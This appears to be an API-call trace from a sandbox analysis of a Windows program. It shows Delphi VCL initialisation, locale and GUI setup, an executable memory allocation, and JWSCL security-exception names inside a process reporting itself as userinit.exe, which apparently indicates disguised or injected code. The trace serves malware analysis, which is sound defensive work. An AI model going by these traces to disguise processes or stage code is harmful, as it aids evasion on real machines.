[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Fri") returned 4
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Friday") returned 7
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Sat") returned 4
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xef1dc, cchData=256 | out: lpLCData="Saturday") returned 9
[0140.793] GetThreadLocale () returned 0x409
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xef238, cchData=256 | out: lpLCData="$") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xef238, cchData=256 | out: lpLCData="0") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xef238, cchData=256 | out: lpLCData="0") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xef330, cchData=2 | out: lpLCData=",") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xef330, cchData=2 | out: lpLCData=".") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xef238, cchData=256 | out: lpLCData="2") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xef330, cchData=2 | out: lpLCData="/") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xef238, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0140.793] GetThreadLocale () returned 0x409
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef204, cchData=256 | out: lpLCData="1") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xef238, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0140.793] GetThreadLocale () returned 0x409
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef204, cchData=256 | out: lpLCData="1") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xef330, cchData=2 | out: lpLCData=":") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xef238, cchData=256 | out: lpLCData="AM") returned 3
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xef238, cchData=256 | out: lpLCData="PM") returned 3
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xef238, cchData=256 | out: lpLCData="0") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xef238, cchData=256 | out: lpLCData="0") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xef238, cchData=256 | out: lpLCData="0") returned 2
[0140.793] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xef330, cchData=2 | out: lpLCData=",") returned 2
[0140.793] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0140.793] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0140.793] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0140.793] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0140.794] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0140.795] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0140.795] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0140.795] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0140.795] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0140.795] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0140.795] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0140.795] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0140.795] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0140.795] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0140.795] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0140.795] GetDC (hWnd=0x0) returned 0x5501085a
[0140.795] GetDeviceCaps (hdc=0x5501085a, index=90) returned 96
[0140.795] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.795] GetDC (hWnd=0x0) returned 0x5501085a
[0140.795] GetDeviceCaps (hdc=0x5501085a, index=104) returned 0
[0140.796] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.796] CreatePalette (plpal=0xeef94) returned 0x40080866
[0140.796] GetStockObject (i=7) returned 0x1b00017
[0140.796] GetStockObject (i=5) returned 0x1900015
[0140.796] GetStockObject (i=13) returned 0x18a002e
[0140.796] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0140.796] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff3d, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff3c, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff3b, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff3a, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff39, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff38, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff37, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff36, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff35, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff34, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff33, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff32, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff31, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff30, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff4f, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff4e, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff4d, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0140.796] LoadStringA (in: hInstance=0x29b0000, uID=0xff4c, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0140.797] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0140.797] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0140.797] GetCurrentThreadId () returned 0x8a0
[0140.797] GlobalAddAtomA (lpString="WndProcPtr029B0000000008A0") returned 0xc120
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfefc, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfefb, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfefa, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef9, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef8, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef7, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef6, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef5, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef4, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef3, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef2, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef1, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xfef0, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff0f, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff0e, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff0d, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff0c, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff0b, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff0a, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff09, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff08, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff07, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff06, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0140.797] LoadStringA (in: hInstance=0x29b0000, uID=0xff05, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff04, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff03, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff02, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff01, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff00, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff1f, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff1e, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff1d, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff1c, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff1b, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff1a, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff19, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff18, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff17, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff16, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff15, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff14, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff13, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff12, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff11, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff10, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff2f, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0140.798] LoadStringA (in: hInstance=0x29b0000, uID=0xff2e, lpBuffer=0xeef90, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0140.798] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0140.798] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0140.798] GetVersion () returned 0x1db10106
[0140.798] GetCurrentProcessId () returned 0x888
[0140.798] GlobalAddAtomA (lpString="Delphi00000888") returned 0xc125
[0140.798] GetCurrentThreadId () returned 0x8a0
[0140.798] GlobalAddAtomA (lpString="ControlOfs029B0000000008A0") returned 0xc11f
[0140.798] RegisterClipboardFormatA (lpszFormat="ControlOfs029B0000000008A0") returned 0xc177
[0140.798] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0140.799] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0140.799] GetSystemMetrics (nIndex=19) returned 1
[0140.799] GetSystemMetrics (nIndex=75) returned 1
[0140.799] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2ad1320, fWinIni=0x0 | out: pvParam=0x2ad1320) returned 1
[0140.799] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0140.799] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0140.799] LoadCursorA (hInstance=0x29b0000, lpCursorName=0x7ff9) returned 0x701b1
[0140.799] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0140.799] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0140.799] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0140.799] LoadCursorA (hInstance=0x29b0000, lpCursorName=0x7ffa) returned 0xa022d
[0140.799] LoadCursorA (hInstance=0x29b0000, lpCursorName=0x7ffb) returned 0x80221
[0140.800] LoadCursorA (hInstance=0x29b0000, lpCursorName=0x7ffc) returned 0x8021d
[0140.800] LoadCursorA (hInstance=0x29b0000, lpCursorName=0x7ffd) returned 0x80219
[0140.800] LoadCursorA (hInstance=0x29b0000, lpCursorName=0x7fff) returned 0x90217
[0140.800] LoadCursorA (hInstance=0x29b0000, lpCursorName=0x7ffe) returned 0x90215
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0140.800] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0140.801] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0140.801] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0140.801] GetDC (hWnd=0x0) returned 0x5501085a
[0140.801] GetDeviceCaps (hdc=0x5501085a, index=90) returned 96
[0140.801] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.801] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0140.801] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2a09a60, dwData=0x2ad156c) returned 1
[0140.801] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xef2fb, fWinIni=0x0 | out: pvParam=0xef2fb) returned 1
[0140.801] CreateFontIndirectA (lplf=0xef2fb) returned 0x780a0857
[0140.801] GetObjectA (in: h=0x780a0857, c=60, pv=0xef0ec | out: pv=0xef0ec) returned 60
[0140.801] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xef1a7, fWinIni=0x0 | out: pvParam=0xef1a7) returned 1
[0140.801] CreateFontIndirectA (lplf=0xef283) returned 0x240a085d
[0140.801] GetObjectA (in: h=0x240a085d, c=60, pv=0xef0ec | out: pv=0xef0ec) returned 60
[0140.801] CreateFontIndirectA (lplf=0xef247) returned 0x2a0a0858
[0140.801] GetObjectA (in: h=0x2a0a0858, c=60, pv=0xef0ec | out: pv=0xef0ec) returned 60
[0140.802] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0140.802] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xef25b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.802] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xef25b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0140.802] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xa0000
[0140.802] GetKeyboardLayoutList (in: nBuff=64, lpList=0xef1dc | out: lpList=0xef1dc) returned 1
[0140.803] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0140.803] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0140.804] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0140.804] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0140.804] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0140.804] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0140.804] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0140.804] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0140.804] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0140.805] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0140.805] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0140.805] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0140.805] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0140.805] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0140.805] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0140.805] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0140.805] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0140.805] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0140.805] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0140.805] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0140.806] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0140.806] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0140.806] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0140.806] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0140.806] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0140.806] LoadStringA (in: hInstance=0x29b0000, uID=0xff59, lpBuffer=0xeef3c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0140.806] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0140.806] LoadStringA (in: hInstance=0x29b0000, uID=0xff5a, lpBuffer=0xeef3c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0140.806] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0140.806] LoadStringA (in: hInstance=0x29b0000, uID=0xff5b, lpBuffer=0xeef3c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0140.806] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0140.806] LoadStringA (in: hInstance=0x29b0000, uID=0xff5c, lpBuffer=0xeef3c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0140.806] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0140.806] SetErrorMode (uMode=0x8000) returned 0x1
[0140.806] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d770000
[0140.808] SetErrorMode (uMode=0x1) returned 0x8000
[0140.809] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreatePropertyFrame") returned 0x6d7720ea
[0140.809] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreateFontIndirect") returned 0x6d7720b7
[0140.809] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreatePictureIndirect") returned 0x6d7720c8
[0140.809] GetProcAddress (hModule=0x6d770000, lpProcName="OleLoadPicture") returned 0x6d7720d9
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a9fa98*="EJwsclUnsupportedException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a9fa80*="EJwsclPIDException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a9fa68*="EJwsclJwShellExecuteException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a9fa50*="EJwsclShellExecuteException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a9fa38*="EJwsclElevationException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a9fa20*="EJwsclAbortException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a9fa08*="EJwsclSuRunErrorException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a9f9f0*="EJwsclElevateProcessException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a9f9d8*="EJwsclCertApiException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a9f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a9f9a8*="EJwsclInvalidStartupInfo") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a9f990*="EJwsclFirewallNoExceptionsException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a9f978*="EJwsclFirewallInactiveException") returned 1
[0140.809] SysReAllocStringLen (in: pbstr=0x2a9f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a9f960*="EJwsclFirewallDelRuleException") returned 1
